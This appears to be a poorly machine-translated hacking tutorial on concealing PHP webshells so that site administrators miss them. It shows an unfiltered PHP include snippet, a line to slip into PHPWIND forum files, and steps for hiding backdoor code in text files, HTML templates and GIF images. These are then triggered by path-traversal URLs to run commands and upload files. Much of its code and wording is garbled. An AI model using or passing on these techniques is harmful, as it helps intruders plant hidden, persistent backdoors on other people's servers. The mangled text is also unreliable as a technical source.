Security knowledge: how to hide PHP webshells

Recently, many of my friends have been asking me if I can hide my Trojan horse in HTML or images. In fact, it is very concealed to insert a Trojan horse into the PHP file, if it is hard to put it in an HTML file or image, let's look at this test report.

You need to know that if you put the PHP statement in the image, it cannot be executed anyway, because PHP only parses files with the extension of php. Therefore, PHP statements hidden in images must be executed. We use the PHP call functions such as include and require.

We still remember the articles that used to hide Trojans in pictures the past few days. That is, the include ("x.gif") statement is used in the PHP file to call the trojan statement hidden in the image. The statements in ASP are similar. It seems very concealed, but it is not difficult to find suspicious things for people who know php a little bit directly by calling images. Because the GET method in the URL is difficult to pass parameters, this makes the performance of the Trojan plug-in unavailable.

The Include function is frequently used in PHP, so there are too many security problems. For example, the PHPWIND1.36 vulnerability is caused by no filtering of variables after include. Then we can construct a similar statement to insert it into the PHP file. Hiding Trojans in images or HTML files is more concealed. For example, insert the following statement in the PHPWIND Forum: <''? @ Include includ/. $ PHPWIND_ROOT ;? > Generally, the administrator cannot see it.

With the include function, we can hide the PHP Trojan to many types of files, such as txt, html, and image files. Because txt, html, and image files are the most common in forums and document systems, we will test them in sequence.

First, create a php file test. php with the following content:

$ Test = $ _ GET ['test'];

@ Include 'test/'. $ test;

?>

Txt files are generally instruction files, so we can put a trojan in the description file of the directory. Create a TXT file t.txt. We paste the scripts to the t.txt file. Then access hxxp: // localhost/test. php? Test = ../t.txt if you see t.txt content, it will prove OK, and then add hxxp: // localhost/test. PHP to the mini php Backdoor client Trojan address in lanker? Add cmd to the password "test = ../t.txt". You can see the returned results.

HTML files are generally template files. To enable the Trojan horse inserted into the HTML file to be called and executed without being displayed, we can add a text box with hidden attributes to the HTML file, for example, use the same method as above. Generally, the returned results of execution can be viewed in the source file. For example, use the function of viewing the program directory. View the source file. The directory C: \ Uniserver2_7s \ www \ test is displayed.

Next, let's talk about image files. The most poisonous way is to hide Trojans in images. You can directly edit an image and insert it to the end of the image.

Generally, the image is not affected by tests. Add the client Trojan address in the same way.

We can see that the result returned by the PHP environment variable is the original image.

There may be some differences with the expected results. In fact, the command has been run, but the returned results are not visible. Because this is a real GIF file, the returned results are not displayed, to verify whether the command is actually executed, we execute the File Upload Command. As expected, the file has been successfully uploaded to the server. The advantage of such forgery is its concealment. The disadvantage is naturally not to mention the lack of ECHO. If you want to see the returned results, take out the notepad and forge a fake image file.